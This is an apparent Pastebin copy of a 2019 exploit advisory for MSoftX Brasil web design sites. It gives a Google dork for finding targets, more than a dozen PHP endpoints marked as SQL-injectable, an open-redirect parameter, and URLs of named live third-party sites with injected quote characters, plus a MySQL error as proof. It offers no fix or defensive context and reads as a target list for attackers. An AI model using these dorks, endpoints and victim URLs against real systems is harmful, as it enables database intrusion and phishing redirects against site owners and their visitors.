Advertisement
KingSkrupellos

MSoftX Brasil Web Design SQL Injection and Open Redirection

Jan 10th, 2019
422
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.36 KB | None | 0 0
  1. ##########################################################
  2.  
  3. # Exploit Title : Desenvolvimento MSoftX Brasil Web Design SQL Injection and Open Redirection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 11/01/2019
  7. # Vendor Homepage : msoftx.com ~ msoftx.com.br
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:''Desenvolvimento MSoftX''
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
  15.  
  16. ##########################################################
  17.  
  18. # SQL Injection Exploit :
  19. ***********************
  20.  
  21. /convenios_ver.php?tipo_convenio=[SQL Injection]
  22.  
  23. /ver_espacocultural.php?id=[SQL Injection]
  24.  
  25. /ver_mensagem.php?id=[SQL Injection]
  26.  
  27. /ver_informativo.php?id=[SQL Injection]
  28.  
  29. /ver_evento.php?id=[SQL Injection]
  30.  
  31. /ver_noticia.php?id=[SQL Injection]
  32.  
  33. /ver_instalacao.php?id=[SQL Injection]
  34.  
  35. /ver_modalidade.php?id=[SQL Injection]
  36.  
  37. /ver_campeonato.php?id=[SQL Injection]
  38.  
  39. /noticias.php?id=[SQL Injection]
  40.  
  41. /compartilha_noticia.php?id=[SQL Injection]
  42.  
  43. /video.php?id=[SQL Injection]
  44.  
  45. /classificados/corpo_destaque_classificados.php?id=[SQL Injection]
  46.  
  47. /curtir_pagina_site.php?url=[OPEN-REDIRECTION-LINK-HERE]
  48.  
  49. ##########################################################
  50.  
  51. # Example Vulnerable Site :
  52. *************************
  53.  
  54. Note => (185.169.96.133) => There are 1,055 domains hosted on this server.
  55.  
  56. Note => (177.85.96.153) => There are 1,243 domains hosted on this server
  57.  
  58. [+] afmm.com.br/ver_noticia.php?id=2062%27
  59.  
  60. [+] lauribittencourt.com.br/noticias.php?id=47%27 =>
  61.  
  62. [ Proof of Concept ] => archive.fo/zdkwB
  63.  
  64. [+] msoftx.com.br/classificados/corpo_destaque_classificados.php?id=15%27
  65.  
  66. [+] afmm.com.br/curtir_pagina_site.php?url=https://cxsecurity.com/
  67.  
  68. ##########################################################
  69.  
  70. # SQL Database Error :
  71. **********************
  72. You have an error in your SQL syntax; check the manual that
  73. corresponds to your MySQL server version for
  74. the right syntax to use near ''2062''' at line 1
  75.  
  76. ##########################################################
  77.  
  78. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  79.  
  80. ##########################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement